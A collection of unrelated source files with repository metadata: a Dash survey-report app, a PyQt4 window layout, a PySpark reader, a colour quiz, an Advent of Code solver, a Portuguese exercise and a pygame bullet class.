    prg = df_prg.loc[(df_prg['program_code'] == program_code)].reset_index(drop=True)
    df_crses_year = df_crses.loc[(df_crses['ams_block_nbr'] == year_level)].reset_index(drop=True)
    crse_list = df_crses_year['course_code'].drop_duplicates().tolist()
    if limit is None:  # fixed: was "== None"
        limit = len(crse_list)
    sub_div = []
    # Iterate the course codes directly; the original indexed with range()
    # and wrapped the lookup in a pointless ``try: ... except: raise``.
    for course_code in crse_list[:limit]:
        crse = df_crses_year.loc[df_crses_year['course_code'] == course_code]
        try:
            sub_div.append(
                html.Div(
                    [
                        make_course_header_div(prg, crse),
                        make_course_div(crse, course_code, program_code),
                    ],
                    className='twelve columns',
                    style={'width': '29.5cm',
                           'height': '20.32cm',
                           'top-margin': 0,
                           'bottom-margin': 0,
                           'right-margin': 50,
                           'left-margin': 50,
                           'border': 'solid'
                           }
                )
            )
        except Exception as e:
            # Keep rendering the remaining courses if one page fails.
            print(e, e.args)
    return html.Div(children=sub_div)
def make_program_pack(program_code):
    """Build the complete data-pack layout for one program.

    The first-page header is excluded here because it doubles as the
    selection box at the top of the app layout.
    """
    # Filter the shared data frames down to the selected program.
    # (df1_crse_prg_ces is computed but unused below -- kept for parity
    # with the original; remove once confirmed dead.)
    df1_crse_prg_ces = get_program_data(df_crse_prg_ces, program_code)
    df1_prg_ces = get_program_data(df_prg_ces, program_code)
    df1_prg_crse = get_program_data(df_prg_crse, program_code)
    try:
        level = df1_prg_ces['level'].tolist()[-1]
    except (KeyError, IndexError):
        # No CES rows (or no 'level' column) for this program: fall back to
        # Higher Ed.  (Narrowed from a bare ``except:``.)
        level = 'HE'
    gts_list = get_gts_questions(level)
    # One page of per-course charts per year level in the program structure.
    year_list = [make_program_year_level_page(program_code, year)
                 for year in df1_prg_crse['ams_block_nbr'].drop_duplicates().tolist()]
    # Both full pages share everything but the height.
    page_style = {'width': '29.5cm',
                  'top-margin': 0,
                  'bottom-margin': 0,
                  'right-margin': 50,
                  'left-margin': 50,
                  'border': 'solid'}
    child = [
        # First page: program-level CES data (shorter because the selector
        # box sits above it).
        html.Div(
            children=make_program_level_page(program_code, level, df1_prg_ces, gts_list),
            className='twelve columns',
            style=dict(page_style, height='18.6 cm'),
        ),
        # Second page: how to read the charts.
        html.Div(
            children=make_addtional_info(),
            className='twelve columns',
            style=dict(page_style, height='20.3cm'),
        ),
        # Year-level pages of per-course CES charts.
        html.Div(children=year_list),
    ]
    return child
def _info_paragraph(children, margins, align='left', size=16, weight='normal'):
    """One paragraph of the info page: standard colouring plus per-paragraph margins."""
    style = {'textAlign': align,
             'font-size': size,
             'color': rc.RMIT_Black,
             'font-weight': weight}
    style.update(margins)
    return html.P(children, style=style)


def make_addtional_info():
    """Build the 'Additional Information' page: how the GTS/OSI percent-agree
    figures are computed (left column) and how to read the per-course plot
    pages that follow (right column).  Returns a list of Dash components.

    NOTE(review): several display strings carry typos from the original
    ("Each students", "GST responses", "much higher the number") -- kept
    byte-for-byte so rendered output is unchanged; confirm before editing
    the user-facing copy.  Two strings previously had a no-op
    ``''.format(end_year, semester)`` applied (no placeholders); dropped.
    """
    side_margins = {'margin-left': 10, 'margin-right': 10}
    # Left column: GTS / OSI calculation explanation.
    gts_column = html.Div(
        className='six columns',
        style={'width': '50%',
               'margin': 0,
               },
        children=[
            _info_paragraph(
                ['How is the GTS (& OSI) Percent Agree calculated?'],
                dict(side_margins, **{'margin-bottom': 0, 'margin-top': 0}),
                align='center', size=18, weight='bold'),
            _info_paragraph(
                ['Each students can answer the OSI only once for a course.'],
                dict(side_margins, **{'margin-bottom': 5})),
            _info_paragraph(
                ['Each student has the option to answer the six GTS questions for every staff member in a course.'
                 ' Hence the number of GST responses can be much higher the number of OSI responses.'],
                dict(side_margins, **{'margin-bottom': 5})),
            _info_paragraph(
                [dcc.Markdown(
                    'The OSI and GTS questions are measured against a 5-point scale \n'
                    '("1: Strongly Disagree to "5: Strongly Agree").')],
                dict(side_margins, **{'margin-bottom': 0})),
            _info_paragraph(
                ['The GTS percent agree is calculated by taking the sum of student responses that'
                 ' "4: Agree" or "5: Strongly Agree" and expressing it as a percentage of all GTS responses.'],
                dict(side_margins, **{'margin-bottom': 5})),
            _info_paragraph(
                ['This means that a neutral response ("3: Neither Agree or Disagree") '
                 ' is effectively counted as a did not agree.'],
                dict(side_margins, **{'margin-bottom': 5})),
            html.Img(
                src='data:image/png;base64,{}'.format(ces_scale_image.decode()),
                style={'height': '160px',
                       'width': '400px',
                       'align': 'middle',
                       'vertical-align': 'middle',
                       'margin-top': 10,
                       'margin-bottom': 10,
                       'margin-left': 60,
                       'margin-right': 0,
                       }
            ),
            _info_paragraph(
                ['The GTS and OSI range from 0 to 100%.'],
                dict(side_margins, **{'margin-bottom': 0})),
        ],
    )
    # Right column: how to read the per-course plot pages.
    plots_column = html.Div(
        className='six columns',
        style={'width': '50%',
               'margin-bottom': 0,
               'margin-top': 0,
               'margin-left': 0,
               'margin-right': 0,
               },
        children=[
            html.Div(
                style={'margin-bottom': 0,
                       'margin-top': 0,
                       'margin-left': 10,
                       'margin-right': 10,
                       },
                children=[
                    _info_paragraph(
                        ['Course Plots'],
                        {'margin-bottom': 0, 'margin-top': 0,
                         'margin-left': 0, 'margin-right': 0},
                        align='center', size=18, weight='bold'),
                    _info_paragraph(
                        [dcc.Markdown('The following pages contain plots for every Course listed in the Program structure,'
                                      ' with GTS plots on the left and OSI plots on the right.')],
                        {'margin-bottom': 0, 'margin-left': 0}),
                    _info_paragraph(
                        [dcc.Markdown('The Course(Program) scores (Red) are calculated using all student responses'
                                      ' for the Course, where the students are also enrolled in the Program.')],
                        {'margin-bottom': 5, 'margin-left': 0}),
                    _info_paragraph(
                        [dcc.Markdown('The Course scores (Dark Blue) are calculated using all student responses'
                                      ' for the Course, regardless of which Program the student is enrolled in.')],
                        {'margin-bottom': 0, 'margin-left': 0}),
                    _info_paragraph(
                        [dcc.Markdown(
                            'Compared the Course/Program and the Course lines to see how your students rate'
                            ' this Course compared to other students enrolled in the Course.')],
                        {'margin-bottom': 10, 'margin-left': 0}),
                    _info_paragraph(
                        [dcc.Markdown('The Program scores (Blue) are calculated using all responses'
                                      ' from any student enrolled in the Program. The responses can be from'
                                      ' any course.'
                                      ' This information is the same as display in the Program plots on Page One')],
                        {'margin-bottom': 0, 'margin-left': 0}),
                    _info_paragraph(
                        [dcc.Markdown(
                            'Compared the Course/Program and the Program lines to see how your students rate'
                            ' this Course compared to the rest of the Program.')],
                        {'margin-bottom': 0, 'margin-left': 0}),
                ],
            ),
        ],
    )
    return [
        # Page heading (single centred column).
        html.Div(
            [
                html.P(
                    children=[dcc.Markdown('**Additional Information**')],
                    style={'fontSize': 24}
                )
            ],
            className='twelve columns',
            style={'text-align': 'center'},
        ),
        # Two-column information body.
        html.Div(
            className='twelve columns',
            style={'margin': 0,
                   },
            children=[gts_column, plots_column],
        ),
    ]
def _legend_line(text, background, margin_top, margin_bottom):
    """One coloured legend row for the course header (white text on a band)."""
    return html.P(
        children=[text],
        style={'textAlign': 'left',
               'padding-left': '10px',
               'font-size': 15,
               'color': rc.RMIT_White,
               'font-weight': 'normal',
               'margin-top': margin_top,
               'margin-bottom': margin_bottom,
               'margin-left': 0,
               'right-margin': 0,
               'background-color': background},
    )


def make_course_header_div(prg, crse):
    """Header strip for one course page: program/course titles on the left
    and the three-line colour legend on the right.

    Falls back to an empty bordered div when ``prg``/``crse`` cannot supply
    a first row (e.g. an empty DataFrame makes ``iloc[0]`` raise
    IndexError).  Narrowed from the original bare ``except:`` so genuine
    programming errors are no longer swallowed.
    """
    try:
        program_code = prg.iloc[0]['program_code']
        course_code = crse.iloc[0]['course_code']
        # Left half - program and course titles.
        titles = html.Div(
            [
                html.Div(
                    children='{}: {}'.format(program_code,
                                             prg.iloc[0]['program_name']),
                    style={'textAlign': 'left',
                           'font-size': 18,
                           'color': rc.RMIT_Black,
                           'font-weight': 'bold',
                           'padding-left': '10px',
                           },
                ),
                html.Div(
                    [
                        html.P(
                            children='{}'.format(crse.iloc[0]['clist_name']),
                            style={'textAlign': 'left',
                                   'font-size': 16,
                                   'color': rc.RMIT_Black,
                                   'font-weight': 'bold',
                                   'margin-bottom': 0,
                                   'padding-left': '20px',
                                   },
                        ),
                        html.P(
                            children='{}: {}'.format(course_code,
                                                     crse.iloc[0]['course_name']),
                            style={'textAlign': 'left',
                                   'font-size': 16,
                                   'color': rc.RMIT_Black,
                                   'font-weight': 'bold',
                                   'margin-bottom': 0,
                                   'padding-left': '30px',
                                   },
                        ),
                    ],
                ),
            ],
            className='six columns',
            style={'width': '50%',
                   'top-margin': 0,
                   'bottom-margin': 0,
                   'right-margin': 0,
                   'left-margin': 0,
                   }
        )
        # Right half - legend explaining the three line colours.
        legend = html.Div(
            [
                _legend_line('{1}({0}): The responses for {1} students enrolled in {0}'
                             ''.format(program_code, course_code),
                             rc.RMIT_Red, 1, 2),
                _legend_line('{0}(All): The responses for {0} students enrolled in any program'
                             ''.format(course_code),
                             rc.RMIT_DarkBlue, 0, 1),
                _legend_line('{0}: The responses for all courses from students enrolled in {0}'
                             ''.format(program_code),
                             rc.RMIT_Blue, 2, 2),
            ],
            className='six columns',
            style={
                'width': '50%',
                'top-margin': 0,
                'bottom-margin': 0,
                'margin-right': 0,
                'margin-left': 0,
            },
        )
        div = html.Div(
            [titles, legend],
            className='twelve columns',
            style={'border': 'solid',
                   }
        )
    except (IndexError, KeyError):
        # Empty or malformed prg/crse frame: render a blank bordered header
        # instead of crashing the whole pack.
        div = html.Div(
            [],
            className='twelve columns',
            style={'border': 'solid'}
        )
    return div
def make_header_div_selector():
    """Top-of-page header: 'Program Pack' title with program and school
    dropdowns on the left, the logo image on the right.

    The dropdown ids ('program-dropdown', 'school-dropdown') are wired to
    the callbacks at the bottom of this file; renaming them would silently
    break the app.
    """
    # Creates first header with course and school dropdown menus
    div = html.Div(
        className='twelve columns',
        style={'width': '29.5cm',
               'border': 'solid',
               'top-margin': 0,
               'bottom-margin': 0,
               'left-margin': 50,
               'right-margin': 50
               },
        children=
        [
            # Left - Dropdown menus
            html.Div(
                className='six columns',
                style={'width': '50%'},
                children=[
                    # Heading
                    html.Div(
                        children='Program Pack',
                        style={
                            'textAlign': 'left',
                            'font-size': 18,
                            'color': rc.RMIT_Black,
                            'font-weight': 'bold',
                            'padding-left': '10px',
                        },
                    ),
                    # Program selector (options narrowed by the school
                    # dropdown via the update_course_dropdown callback).
                    html.Div(
                        style={
                            'font-size': 14,
                            'color': rc.RMIT_Black,
                            'font-weight': 'bold',
                            'top-margin': 0,
                            'bottom-margin': 0,
                            'right-margin': 0
                        },
                        children=[
                            dcc.Dropdown(
                                id='program-dropdown',
                                options=create_program_options(df_prg),
                                value=None,
                                placeholder="Select a Program",
                            ),
                        ],
                    ),
                    # School selector.
                    html.Div(
                        style={'font-size': 14,
                               'color': rc.RMIT_Black,
                               'font-weight': 'bold',
                               'top-margin': 0,
                               'bottom-margin': 0,
                               'right-margin': 0,
                               },
                        children=[
                            dcc.Dropdown(
                                id='school-dropdown',
                                options=create_school_options(),
                                value=None,
                                placeholder="Select a School"
                            ),
                        ],
                    ),
                ],
            ),
            # Right - Image
            html.Div(
                className='five columns',
                style={
                    'width': '45%',
                    'align': 'middle',
                    'vertical-align': 'middle',
                    'top-margin': 0,
                    'bottom-margin': 0,
                    'right-margin': 0,
                    'left-margin': 0,
                },
                children=[
                    html.Img(
                        src='data:image/png;base64,{}'.format(logo.decode()),
                        style={'height': '80px',
                               'align': 'middle',
                               'vertical-align': 'middle',
                               'margin-top': 10,
                               'margin-left': 180}
                    ),
                ],
            ),
        ],
    )
    return div
# Create app layout: two stylesheets, the selector header, and an initially
# empty 'program-pack' div that the create_page callback fills in.
app.layout = html.Div(
    [
        html.Link(
            rel='stylesheet',
            href='/static/bWLwgP.css'
        ),
        html.Link(
            rel='stylesheet',
            href='/static/remove_undo.css'
        ),
        make_header_div_selector(),
        # Populated by create_page() when a program is selected.
        html.Div(
            id='program-pack'
        ),
    ]
)
'''----------------------- Main Graph Controlled ----------------------------------'''
'''---------------------- Options updates -----------------------------'''
''' Dropdowns'''
# Update course options based on school selection
@app.callback(Output('program-dropdown', 'options'),
              [Input('school-dropdown', 'value')])
def update_course_dropdown(school):
    """Refresh the program-dropdown options when a school is picked.

    NOTE(review): despite the name, this updates the *program* dropdown --
    presumably a leftover name from a course-pack variant of this app.
    """
    return create_program_options(df_prg, school)
# Rebuild the displayed data pack whenever the selected program changes.
@app.callback(
    Output('program-pack', 'children'),
    [Input('program-dropdown', 'value')],
)
def create_page(program_code):
    """Return the program pack layout for ``program_code``; empty until one is chosen."""
    return [] if program_code is None else make_program_pack(program_code)
if __name__ == '__main__':
    # Run the Dash development server locally.
    app.run_server(port=8050, host='127.0.0.1', debug=False)
| [
"peter.ryan2@rmit.edu.au"
] | peter.ryan2@rmit.edu.au |
29df50b53bfec0285ce910afd066e2861e714291 | 99c96bd34c64110372ca83f7256f95cfd336b005 | /maincontrol/Ui_maincontrol.py | 534216990e507d624c1c72433dbfc9e4382a6ad3 | [] | no_license | logsoft/StepperSuite | 03ef601fc70cc17fc83c78036f3532df59b2702d | 6ffad74def753ed1a6f5dc681559cc16b92959d7 | refs/heads/master | 2020-03-31T08:04:41.564232 | 2012-07-05T22:16:52 | 2012-07-05T22:16:52 | 4,838,451 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 15,304 | py | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'maincontrol.ui'
#
# Created: Thu Jul 5 01:23:40 2012
# by: PyQt4 UI code generator 4.7.4
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
class Ui_MainWindow(object):
    """Main-window layout for StepperSuite (originally emitted by pyuic4).

    NOTE(review): the file header says this was generated from
    'maincontrol.ui'; regenerating that .ui file will discard hand edits.
    The widget tree, object names, geometry and palette below reproduce the
    generated output exactly.
    """

    @staticmethod
    def _mono_font(point_size=None):
        """Return the app's monospace font, optionally with a point size."""
        font = QtGui.QFont()
        font.setFamily("DejaVu Sans Mono")
        if point_size is not None:
            font.setPointSize(point_size)
        return font

    @staticmethod
    def _build_palette():
        """Recreate the generated colour palette from role/colour tables."""
        # Colours shared by the Active and Inactive groups (identical in the
        # generated code).
        base = {
            QtGui.QPalette.WindowText: (0, 0, 0),
            QtGui.QPalette.Button: (219, 223, 255),
            QtGui.QPalette.Light: (254, 255, 248),
            QtGui.QPalette.Midlight: (224, 231, 202),
            QtGui.QPalette.Dark: (97, 103, 78),
            QtGui.QPalette.Mid: (129, 138, 104),
            QtGui.QPalette.Text: (0, 0, 0),
            QtGui.QPalette.BrightText: (255, 255, 255),
            QtGui.QPalette.ButtonText: (0, 0, 0),
            QtGui.QPalette.Base: (219, 223, 255),
            QtGui.QPalette.Window: (219, 223, 255),
            QtGui.QPalette.Shadow: (0, 0, 0),
            QtGui.QPalette.AlternateBase: (224, 231, 205),
            QtGui.QPalette.ToolTipBase: (255, 255, 220),
            QtGui.QPalette.ToolTipText: (0, 0, 0),
        }
        # The Disabled group dims the text roles and the alternate base.
        disabled_overrides = {
            QtGui.QPalette.WindowText: (97, 103, 78),
            QtGui.QPalette.Text: (97, 103, 78),
            QtGui.QPalette.ButtonText: (97, 103, 78),
            QtGui.QPalette.AlternateBase: (194, 207, 156),
        }
        palette = QtGui.QPalette()
        for group in (QtGui.QPalette.Active, QtGui.QPalette.Inactive,
                      QtGui.QPalette.Disabled):
            colors = dict(base)
            if group == QtGui.QPalette.Disabled:
                colors.update(disabled_overrides)
            for role, rgb in colors.items():
                brush = QtGui.QBrush(QtGui.QColor(*rgb))
                brush.setStyle(QtCore.Qt.SolidPattern)
                palette.setBrush(group, role, brush)
        return palette

    def setupUi(self, MainWindow):
        """Create and lay out every widget on ``MainWindow``."""
        MainWindow.setObjectName("MainWindow")
        MainWindow.setEnabled(True)
        MainWindow.resize(1114, 719)
        MainWindow.setPalette(self._build_palette())
        MainWindow.setStyleSheet("background-color: rgb(219, 223, 255);")
        MainWindow.setTabShape(QtGui.QTabWidget.Rounded)
        MainWindow.setUnifiedTitleAndToolBarOnMac(False)
        self.centralwidget = QtGui.QWidget(MainWindow)
        self.centralwidget.setObjectName("centralwidget")
        self.label_head = QtGui.QLabel(self.centralwidget)
        self.label_head.setGeometry(QtCore.QRect(10, 10, 1091, 32))
        self.label_head.setFont(self._mono_font(20))
        self.label_head.setAlignment(QtCore.Qt.AlignCenter)
        self.label_head.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
        self.label_head.setObjectName("label_head")
        self.pushButton_lancControl = QtGui.QPushButton(self.centralwidget)
        self.pushButton_lancControl.setGeometry(QtCore.QRect(10, 460, 160, 41))
        self.pushButton_lancControl.setObjectName("pushButton_lancControl")
        self.label_ip_port = QtGui.QLabel(self.centralwidget)
        self.label_ip_port.setGeometry(QtCore.QRect(10, 420, 151, 34))
        self.label_ip_port.setFont(self._mono_font(8))
        self.label_ip_port.setAlignment(QtCore.Qt.AlignCenter)
        self.label_ip_port.setObjectName("label_ip_port")
        # Placeholder frames: (attribute/object name, geometry, minimum size).
        # Creation order matches the generated code (affects stacking order).
        for name, geometry, minimum in (
                ('frame_com_placeholder', (10, 270, 160, 150), (160, 150)),
                ('frame_control_placeholder', (10, 50, 500, 215), (500, 215)),
                ('frame_drives_placeholder', (170, 270, 160, 230), (160, 230)),
                ('frame_points_placeholder', (520, 50, 580, 460), (500, 215)),
                ('frame_sequencer_placeholder', (520, 510, 580, 180), (570, 180)),
        ):
            frame = QtGui.QFrame(self.centralwidget)
            frame.setGeometry(QtCore.QRect(*geometry))
            frame.setMinimumSize(QtCore.QSize(*minimum))
            frame.setFrameShape(QtGui.QFrame.StyledPanel)
            frame.setFrameShadow(QtGui.QFrame.Raised)
            frame.setObjectName(name)
            setattr(self, name, frame)
        # Only the sequencer frame carries the monospace font (no size set).
        self.frame_sequencer_placeholder.setFont(self._mono_font())
        MainWindow.setCentralWidget(self.centralwidget)
        self.menubar = QtGui.QMenuBar(MainWindow)
        self.menubar.setGeometry(QtCore.QRect(0, 0, 1114, 21))
        self.menubar.setNativeMenuBar(False)
        self.menubar.setObjectName("menubar")
        self.menuFile = QtGui.QMenu(self.menubar)
        self.menuFile.setObjectName("menuFile")
        MainWindow.setMenuBar(self.menubar)
        # All four actions exist; note 'actionSetup' is created but never
        # added to a menu, exactly as in the generated code.
        for action_name in ('action_Load', 'action_Save', 'actionSetup',
                            'action_Drive_Parameter'):
            action = QtGui.QAction(MainWindow)
            action.setObjectName(action_name)
            setattr(self, action_name, action)
        self.menuFile.addAction(self.action_Load)
        self.menuFile.addAction(self.action_Save)
        self.menuFile.addAction(self.action_Drive_Parameter)
        self.menubar.addAction(self.menuFile.menuAction())
        self.retranslateUi(MainWindow)
        QtCore.QMetaObject.connectSlotsByName(MainWindow)

    @staticmethod
    def _tr(text):
        """Translate ``text`` in the 'MainWindow' context (Qt4 signature)."""
        return QtGui.QApplication.translate(
            "MainWindow", text, None, QtGui.QApplication.UnicodeUTF8)

    def retranslateUi(self, MainWindow):
        """Install all user-visible strings (re-run on locale change)."""
        MainWindow.setWindowTitle(self._tr("StepperSuite V0.1 Alpha"))
        self.label_head.setText(self._tr("StepperSuite V0.1 Alpha"))
        self.pushButton_lancControl.setText(self._tr("lanc Control"))
        self.label_ip_port.setText(self._tr("111.222.333.444:4567"))
        self.menuFile.setTitle(self._tr("&File"))
        self.action_Load.setText(self._tr("&Load"))
        self.action_Save.setText(self._tr("&Save"))
        self.actionSetup.setText(self._tr("Drive Parameter"))
        self.action_Drive_Parameter.setText(self._tr("&Drive Parameter"))
if __name__ == "__main__":
import sys
app = QtGui.QApplication(sys.argv)
MainWindow = QtGui.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
| [
"hpl@hpl.hpl"
] | hpl@hpl.hpl |
82c91f388c411504015973bf1a1a0877af34f0b5 | 66d54cc8a91f1faf24f1435a67610e6a17450483 | /Reader.py | 1babc787a7152fee4e9994491192745c6e7a2154 | [] | no_license | vickyasokan26/NikeAssignment | d88a4db6c9ffb3365df5e53bddd851e7e25d39d3 | 747e49c1e11760a4f9e966169c650a512063c9f8 | refs/heads/main | 2023-01-25T04:26:33.695109 | 2020-11-23T08:46:05 | 2020-11-23T08:46:05 | 315,249,042 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 967 | py | '''
Created on Nov 17, 2020
@author: Vignesh.Asokan
'''
from pyspark.sql.types import *
from pyspark import HiveContext,SparkContext
from pyspark.sql.functions import *
from pyspark.sql.types import *
from pyspark.sql.window import *
class Reader(object):
    """Thin wrapper around a Spark session for reading CSVs and running SQL."""

    def __init__(self, filePath, sparkSession):
        """Remember the base data directory and the Spark session to use."""
        self.filePath = filePath
        self.sparkSession = sparkSession

    def read_csv(self, fileName):
        """Read ``fileName`` (relative to ``filePath``) as a CSV with a header row."""
        print(self.filePath)
        # BUG FIX: the original had a doubled comma here
        # (``... + fileName,, header='true')``), which is a SyntaxError.
        wandRawDf = self.sparkSession.read.csv(self.filePath + "/" + fileName,
                                               header='true')
        return wandRawDf

    def read_df_data(self, sql):
        """Run ``sql``, show the result (debug output), and return the DataFrame."""
        df = self.sparkSession.sql(sql)
        df.show()
        return df

    def prep_data(self, sqltext, tablename):
        """Run ``sqltext`` and register the result as temp table ``tablename``."""
        df = self.sparkSession.sql(sqltext)
        df.registerTempTable(tablename)
        print("Temporary spark table registered as %s" % tablename)
        return df
| [
"noreply@github.com"
] | vickyasokan26.noreply@github.com |
14459048d6ce2c35a80f1df6dbb6c17aa6130118 | a07dd9194143bf7bcb3a2479d4b9306df96237f3 | /lab3/homework/back-color-problem/back_color.py | 3d7cb608ccb58e5c92d39a81b8c67d222036ff6b | [] | no_license | hanguyen31099/NguyenHA-lab-c4e25 | 8b97e1a7ccb37b5ad6809064f591500d99337f27 | bb77fd00b8db696dba3aee328cf2fd6e31448a2c | refs/heads/master | 2020-04-15T10:06:23.336077 | 2019-01-18T19:54:45 | 2019-01-18T19:54:45 | 164,580,386 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,227 | py | from random import choice,randint
# Quiz shapes: each entry holds the colour word shown to the player
# ('text'), its hex fill colour ('color'), and its on-screen rectangle as
# [x, y, width, height] ('rect').
shapes = [
    {
        'text': 'blue',
        'color': '#3F51B5',
        'rect': [20, 60, 100, 100]
    },
    {
        'text': 'red',
        'color': '#C62828',
        'rect': [140, 60, 100, 100]
    },
    {
        'text': 'yellow',
        'color': '#FFD600',
        'rect': [20, 180, 100, 100]
    },
    {
        'text': 'green',
        'color': '#4CAF50',
        'rect': [140, 180, 100, 100]
    }
]
def is_inside(x, y):
    """Return True if point ``x`` = (px, py) lies inside rect ``y`` = [rx, ry, w, h].

    Boundary points count as inside (comparisons are inclusive), matching
    the original behaviour.
    """
    rx, ry, width, height = y[0], y[1], y[2], y[3]
    # Direct boolean expression instead of ``if cond: return True else False``.
    return rx <= x[0] <= rx + width and ry <= x[1] <= ry + height
def get_shapes():
    """Return the module-level list of quiz shapes."""
    return shapes
def generate_quiz():
    """Pick a random shape and quiz type.

    Returns ``[TEXT, color_hex, quiz_type]`` where TEXT is the shape's
    colour word upper-cased, color_hex is its fill colour, and quiz_type is
    0 or 1 (1 means match by word -- see mouse_press).
    """
    shape = choice(shapes)
    # Read the fields by key instead of relying on dict iteration order,
    # which the original implicitly depended on.
    return [shape['text'].upper(), shape['color'], randint(0, 1)]
def mouse_press(x, y, text, color, quiz_type):
    """Return True if the click at (x, y) landed on the shape the quiz asked for.

    quiz_type 1 matches by upper-cased colour word ``text``; any other value
    matches by hex ``color``.  Returns False when no shape matches -- the
    original raised UnboundLocalError in that case because ``user_click``
    was only assigned inside the matching branch.
    """
    user_click = False
    for shape in shapes:
        if quiz_type == 1:
            matched = shape['text'].upper() == text
        else:
            matched = shape['color'] == color
        if matched:
            user_click = is_inside([x, y], shape['rect'])
    return user_click
"ducha31099@gmail.com"
] | ducha31099@gmail.com |
4d5c0786be25e6910e4ce018e76c712744d39dae | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/74/usersdata/197/40006/submittedfiles/lecker.py | 2e27da6fdd494d21fc5e283193a357ccb803379a | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 449 | py | # -*- coding: utf-8 -*-
import math
a=int(input('Digite o valor do número a:'))
b=int(input('Digite o valor do número b:'))
c=int(input('Digite o valor do número c:'))
d=int(input('Digite o valor do número d:'))
if a>b and b<c and c>d:
print('N')
elif a==b==c==d:
print('N')
elif a<b and b>c and c<d:
print('N')
elif a>b and b<c and c<d:
print('N')
elif a==b==c>=d and a<b==c==d and a==b<c==d:
print('N')
else:
print('S') | [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
407e0b18a27b4d34d828fa381f05a13aba1a286e | 12f2f98d8c9055d721afa065b49014c550bae999 | /alien_invasion/bullet.py | 3122099de4a668be5295666cb9b969324d425e91 | [] | no_license | zhangletian/LearnPython | 9568b79d23135f919fccbcf7e775d1fe6f6bcaf2 | 32b05e18a3d2f1da2fa3c82268abf384ab83fa73 | refs/heads/master | 2021-01-22T08:39:42.000182 | 2017-12-18T14:46:52 | 2017-12-18T14:46:52 | 92,629,716 | 0 | 0 | null | null | null | null | GB18030 | Python | false | false | 940 | py | #coding=gbk
import pygame
from pygame.sprite import Sprite
class Bullet(Sprite):
    """A single bullet fired upward from the player's ship."""

    def __init__(self, ai_settings, screen, ship):
        """Create a bullet at the ship's current position."""
        super(Bullet, self).__init__()
        self.screen = screen
        # Appearance and speed come straight from the settings object.
        self.color = ai_settings.bullet_color
        self.speed_factor = ai_settings.bullet_speed_factor
        # Build the bullet rect at (0, 0), then move it to the ship's nose.
        self.rect = pygame.Rect(0, 0, ai_settings.bullet_width,
                                ai_settings.bullet_height)
        self.rect.centerx = ship.rect.centerx
        self.rect.top = ship.rect.top
        # Track the vertical position as a float for sub-pixel movement.
        self.y = float(self.rect.y)

    def update(self):
        """Move the bullet up the screen."""
        self.y -= self.speed_factor
        self.rect.y = self.y

    def draw_bullet(self):
        """Draw the bullet onto the screen surface."""
        pygame.draw.rect(self.screen, self.color, self.rect)
| [
"1007174589@qq.com"
] | 1007174589@qq.com |
f7234016547b643a8a80255493b8b3d0f411f538 | 5a9cad0e55708a25aa77296fba867cd06bf80a20 | /day8/handheld_halting_part2.py | acec6610074f0a157e553430d3641a7f6da6ef15 | [] | no_license | PlaybackSwede/advent-of-code-2020 | d10420eff54fe390e88fdaa72764b555c36d7d4b | 3c805715e0f3677ca55424ef709d82f8139a6f09 | refs/heads/master | 2023-02-13T17:06:50.951304 | 2020-12-19T22:51:39 | 2020-12-19T22:51:39 | 320,923,072 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,578 | py |
# program counter -> (opcode, argument, times_executed); mutated by run_program.
instructions_map = {}
# Pristine snapshot of instructions_map, restored between patch attempts.
map_copy = {}
def save_map():
    """Snapshot the current instruction map so it can be restored later."""
    global map_copy
    map_copy = dict(instructions_map)
def reset_map():
global instructions_map
instructions_map = map_copy.copy()
def filter_jmp_nop(item):
    """Predicate for filter(): True when an (index, instruction) pair holds
    a 'jmp' or 'nop' opcode — the only instructions worth flipping.

    *item* is a (key, (opcode, argument, exec_count)) pair as produced by
    ``instructions_map.items()``.
    """
    _index, instruction = item
    # Membership test replaces the redundant if/else-return-boolean chain.
    return instruction[0] in ('jmp', 'nop')
def run_program():
    """Execute the boot code held in the module-level ``instructions_map``.

    Each entry is (opcode, argument, exec_count); the exec_count is bumped
    as instructions run so a second visit can be detected.  Returns the
    accumulator if the program counter runs exactly one past the last
    instruction, or -1 if an infinite loop is detected.
    """
    acc = 0
    pc = 0
    while True:
        op, arg, exec_count = instructions_map[pc]
        if exec_count > 0:
            # About to execute an instruction a second time: infinite loop.
            return -1
        # Mark this instruction as executed before performing it.
        instructions_map[pc] = (op, arg, exec_count + 1)
        if op == 'acc':
            acc += arg
            pc += 1
        elif op == 'jmp':
            pc += arg
        elif op == 'nop':
            pc += 1
        if pc == len(instructions_map):
            # Program counter just past the final instruction: normal exit.
            return acc
# --- Script entry: parse the boot code, then brute-force the one-instruction
# fix by flipping each jmp<->nop until the program terminates normally. ---
# The context manager closes the input file (the original leaked the handle).
with open('input.txt', 'r') as input_file:
    lines = input_file.readlines()
for ins_nbr, line in enumerate(lines):
    # strip() already removes the trailing newline; the extra strip('\n')
    # and the dead "val[1:] == '+'" conditional were removed — int() parses
    # a leading '+' or '-' sign natively.
    [ins, val] = line.strip().split(' ')
    instructions_map[ins_nbr] = (ins, int(val), 0)
save_map()
nop_jmp_indexes = filter(filter_jmp_nop, instructions_map.items())
for idx, p in nop_jmp_indexes:
    # Restore pristine state, flip one instruction, and try again.
    reset_map()
    if p[0] == 'jmp':
        instructions_map[idx] = ('nop', p[1], 0)
    elif p[0] == 'nop':
        instructions_map[idx] = ('jmp', p[1], 0)
    accumulator = run_program()
    if accumulator > 0:
        # Program terminated normally: this flip was the fix.
        print(accumulator)
        break
| [
"pontus.ovhagen@tidal.com"
] | pontus.ovhagen@tidal.com |
